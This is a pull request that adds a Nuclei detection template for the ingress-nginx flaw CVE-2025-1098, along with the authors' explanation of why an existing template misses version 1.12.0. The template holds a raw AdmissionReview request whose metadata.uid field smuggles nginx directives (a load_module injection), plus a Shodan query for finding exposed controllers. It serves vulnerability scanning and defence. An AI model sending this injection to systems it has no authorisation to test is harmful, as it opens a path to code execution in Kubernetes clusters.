### PR TITLE
Add Improved Detection Template for IngressNightmare (CVE-2025-1098)

### DIFF
--- a/http/cves/2025/CVE-2025-1098.yaml
+++ b/http/cves/2025/CVE-2025-1098.yaml
@@ -1,0 +1,122 @@
+id: CVE-2025-1098
+
+info:
+  name: Ingress-Nginx Controller - RCE via UID Field (load_module injection)
+  author: UNC1739
+  severity: critical
+  description: |
+    This template tests CVE-2025-1098 using an injection in the `metadata.uid` field, inserting an nginx directive via `load_module`, which may be interpreted by a vulnerable ingress-nginx controller when the `mirror-target` annotation triggers template rendering.
+  impact: |
+    Exploiting this allows an attacker to inject nginx directives and potentially execute arbitrary code within the ingress controller.
+  remediation: |
+    Update Ingress-Nginx to v1.12.1 or v1.11.5 or later.
+  reference:
+    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
+    - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-1974
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-653
+    cve-id: CVE-2025-1098
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: ssl:"ingress-nginx" port:8443
+  tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,rce
+
+http:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+          "kind": "AdmissionReview",
+          "apiVersion": "admission.k8s.io/v1",
+          "request": {
+            "uid": "3babc164-2b11-4c9c-976a-52f477c63e35",
+            "kind": {
+              "group": "networking.k8s.io",
+              "version": "v1",
+              "kind": "Ingress"
+            },
+            "resource": {
+              "group": "networking.k8s.io",
+              "version": "v1",
+              "resource": "ingresses"
+            },
+            "requestKind": {
+              "group": "networking.k8s.io",
+              "version": "v1",
+              "kind": "Ingress"
+            },
+            "requestResource": {
+              "group": "networking.k8s.io",
+              "version": "v1",
+              "resource": "ingresses"
+            },
+            "name": "minimal-ingress",
+            "namespace": "default",
+            "operation": "CREATE",
+            "userInfo": {
+              "uid": "1619bf32-d4cb-4a99-a4a4-d33b2efa3bc6"
+            },
+            "object": {
+              "kind": "Ingress",
+              "apiVersion": "networking.k8s.io/v1",
+              "metadata": {
+                "name": "minimal-ingress",
+                "namespace": "default",
+                "creationTimestamp": null,
+                "uid": "InjectTest#;\n\n}\n}\n}\nload_module test;",
+                "annotations": {
+                  "nginx.ingress.kubernetes.io/mirror-target": "fake-mirror-target"
+                }
+              },
+              "spec": {
+                "ingressClassName": "nginx",
+                "rules": [
+                  {
+                    "host": "test.example.com",
+                    "http": {
+                      "paths": [
+                        {
+                          "path": "/",
+                          "pathType": "Prefix",
+                          "backend": {
+                            "service": {
+                              "name": "kubernetes",
+                              "port": {
+                                "number": 443
+                              }
+                            }
+                          }
+                        }
+                      ]
+                    }
+                  }
+                ]
+              },
+              "status": {
+                "loadBalancer": {}
+              }
+            },
+            "oldObject": null,
+            "dryRun": true,
+            "options": {
+              "kind": "CreateOptions",
+              "apiVersion": "meta.k8s.io/v1"
+            }
+          }
+        }
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'AdmissionReview'
+          - 'load_module'
+          - 'directive is specified too late'
+        condition: and


### PR DESCRIPTION
This PR adds a new Nuclei template to detect vulnerable instances of the NGINX ingress admission controller affected by CVE-2025-1098, one of the vulnerabilities collectively referred to as IngressNightmare. Our motivation for this contribution stems from the discovery that the existing detection template for CVE-2025-24514 (named as CVE-2025-1974 in the nuclei templates repository) does not reliably identify vulnerable instances running v1.12.0 of the ingress-nginx controller. While this version introduced partial hardening that blocks exploitation of CVE-2025-24514, it remains exploitable via CVE-2025-1098, which targets a different unprotected field in the ingress object. We detail why this is the case in more detail in an issue we submitted to the nuclei templates repository at https://github.com/projectdiscovery/nuclei-templates/issues/11854